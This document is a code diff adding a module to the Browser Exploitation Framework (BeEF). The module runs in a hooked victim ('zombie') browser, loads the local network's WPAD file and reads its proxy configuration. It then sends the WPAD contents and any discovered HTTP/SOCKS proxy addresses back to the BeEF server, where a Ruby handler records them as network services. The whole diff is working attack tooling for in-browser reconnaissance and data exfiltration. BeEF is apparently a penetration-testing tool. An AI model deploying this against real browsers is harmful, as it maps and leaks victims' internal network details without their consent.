Add Get Proxy Servers (WPAD) module

modules/network/get_proxy_servers_wpad/command.js

@@ -0,0 +1,48 @@
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+  load_script = function(url) {
+    beef.debug("[Get Proxy Servers] Loading: " + url);
+    var s = document.createElement("script");
+    s.type = 'text/javascript';
+    s.src  = url;
+    document.body.appendChild(s);
+  }
+
+  read_wpad = function() {
+    if (typeof FindProxyForURL === 'function') {
+      var wpad = FindProxyForURL.toString();
+      beef.debug("[Get Proxy Servers] Success: Found wpad (" + wpad.length + ' bytes)');
+      beef.net.send("<%= @command_url %>", <%= @command_id %>, "has_wpad=true&wpad="+wpad);
+    } else {
+      beef.debug("[Get Proxy Servers] Error: Did not find wpad");
+      beef.net.send("<%= @command_url %>", <%= @command_id %>, "has_wpad=false");
+      return;
+    }
+    var proxies = [];
+    var proxyRe = /PROXY\s+[a-zA-Z0-9\.\-_]+:[0-9]{1,5}/g;
+    while (match = proxyRe.exec(wpad)) {
+      proxies.push(match[0]);
+    }
+    var proxyRe = /SOCKS\s+[a-zA-Z0-9\.\-_]+:[0-9]{1,5}/g;
+    while (match = proxyRe.exec(wpad)) {
+      proxies.push(match[0]);
+    }
+    if (proxies.length == 0) {
+      beef.debug("[Get Proxy Servers] Found no proxies");
+      return;
+    }
+    beef.debug("[Get Proxy Servers] Found "+proxies.length+" proxies: " + proxies.join(','));
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, "proxies=" + proxies.join(','));
+  }
+
+  load_script("http://wpad/wpad.dat");
+  setTimeout("read_wpad()", 10000);
+
+});
+

modules/network/get_proxy_servers_wpad/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        get_proxy_servers_wpad:
+            enable: true
+            category: "Network"
+            name: "Get Proxy Servers (WPAD)"
+            description: "This module retrieves proxy server addresses for the zombie browser's local network using Web Proxy Auto-Discovery Protocol (WPAD).<br/><br/>Note: The zombie browser must resolve <i>wpad</i> to an IP address successfully for this module to work."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]

modules/network/get_proxy_servers_wpad/module.rb

@@ -0,0 +1,33 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Get_proxy_servers_wpad < BeEF::Core::Command
+
+  def post_execute
+    save({'result' => @datastore['result']})
+
+    configuration = BeEF::Core::Configuration.instance
+    return unless configuration.get("beef.extension.network.enable") == true
+    session_id = @datastore['beefhook']
+    if @datastore['results'] =~ /^proxies=(.+)$/
+      proxies = $1.to_s
+      proxies.split(',').uniq.each do |proxy|
+        if proxy =~ /^(SOCKS|PROXY)\s+([\d\.]+:[\d]{1,5})/
+          proxy_type = "#{$1}"
+          ip = $2.to_s.split(':')[0]
+          port = $2.to_s.split(':')[1]
+          proto = 'HTTP' if proxy_type =~ /PROXY/
+          proto = 'SOCKS' if proxy_type =~ /SOCKS/
+          if BeEF::Filters.is_valid_ip?(ip)
+            print_debug("Hooked browser found #{proto} proxy [ip: #{ip}, port: #{port}]")
+            BeEF::Core::Models::NetworkService.add(:hooked_browser_id => session_id, :proto => proto.downcase, :ip => ip, :port => port, :type => "#{proto} Proxy")
+          end
+        end
+      end
+    end
+  end
+
+end
+